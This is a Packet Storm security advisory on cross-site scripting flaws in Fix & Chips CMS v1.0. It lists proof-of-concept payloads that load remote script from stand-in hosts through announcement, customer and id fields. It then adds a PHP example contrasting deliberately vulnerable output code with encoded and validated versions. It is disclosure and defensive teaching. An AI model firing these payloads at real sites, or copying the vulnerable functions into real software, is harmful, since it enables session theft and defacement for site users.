fcCMS10-xss.txt

Packet Storm ID: PACKETSTORM:53516
Published: Jan 13, 2007
Author: Luny
Source: packetstormsecurity.com
Fix & Chips CMS v1.0  
  
http://software.fixnchipsit.com/  
  
Vulnerable files:  
  
staff.php  
delete-announce.php  
new-customer.php  
search.php  
client-results.php  
--------------------------------------------  
  
staff.php XSS  
User input in the Announcement box isn't properly sanitized before being output to the page.  
  
A few PoCs that work:  
  
<SCRIPT SRC=http://somesite.com/xss.js></SCRIPT>  
  
<IMG SRC=javascript:alert("XSS")>  
  
----------------------------------------------  
  
delete-announce.php XSS  
  
http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/xss.js></SCRIPT>  
  
-------------------------------------------------  
new-customer.php  
  
User input in all of the input boxes when adding a new customer isn't sanitized. For a PoC, in any input box when adding a new client put:  
  
<SCRIPT SRC=http://example.com/xss.js></SCRIPT>  
  
Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.  
  
------------------------------------------------  
  
- Luny  
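The pattern behind all five files is the same: a request parameter or a stored customer/announcement field is concatenated into HTML without encoding. The PHP below is an added example written for this page, not code from Fix & Chips CMS; the function names, the `h()` helper and the sample input are assumptions. It puts the vulnerable pattern the advisory describes next to a hardened form: `delete-announce.php`'s `id` is validated as an integer so there is nothing to reflect, and stored text for `staff.php` / `client-results.php` is HTML-encoded once at output time.

```php
<?php
// Added example, not Fix & Chips CMS code. Function names, the h() helper
// and the $payload string are assumptions for illustration.

// One output-encoding helper used for every untrusted value that is placed
// in an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// --- delete-announce.php: the id parameter is echoed back to the user ---

// Vulnerable pattern (what the advisory describes): whatever arrives in ?id=
// is reflected into the response unchanged.
function deleteNoticeVulnerable(array $get): string
{
    return 'Deleted announcement ' . ($get['id'] ?? '');
}

// Hardened: the id must be a positive integer; anything else is rejected
// before it can reach the page, so no encoding decision is even needed.
function deleteNoticeHardened(array $get): string
{
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 'Invalid announcement id';
    }
    return 'Deleted announcement ' . $id;
}

// --- staff.php / new-customer.php / client-results.php: stored fields ---

// Vulnerable pattern: the stored announcement or customer field is placed
// straight into the markup, so a stored <script> tag runs for every viewer.
function renderFieldVulnerable(string $text): string
{
    return '<div class="field">' . $text . '</div>';
}

// Hardened: the same value encoded at output time; angle brackets and
// quotes become entities and the browser shows the text instead of running it.
function renderFieldHardened(string $text): string
{
    return '<div class="field">' . h($text) . '</div>';
}

// Constructed input: one of the advisory's own PoC strings.
$payload = '<SCRIPT SRC=http://example.com/xss.js></SCRIPT>';

echo renderFieldVulnerable($payload), "\n";   // script element survives into the page
echo renderFieldHardened($payload), "\n";     // rendered as literal text
echo deleteNoticeVulnerable(['id' => $payload]), "\n";
echo deleteNoticeHardened(['id' => $payload]), "\n"; // rejected
echo deleteNoticeHardened(['id' => '42']), "\n";     // accepted
```

Two caveats a reviewer would raise against a fix like this. First, `htmlspecialchars` is correct for HTML body text and quoted attribute values only; a value written into an unquoted attribute, a `src`/`href` URL, or inline JavaScript needs that context's own encoding (and for URLs, a scheme allowlist, which is what stops the `javascript:` image source in the second PoC). Second, encode at output rather than at input: the advisory's `search.php` and `client-results.php` findings are a direct consequence of trusting that data was cleaned when it was stored.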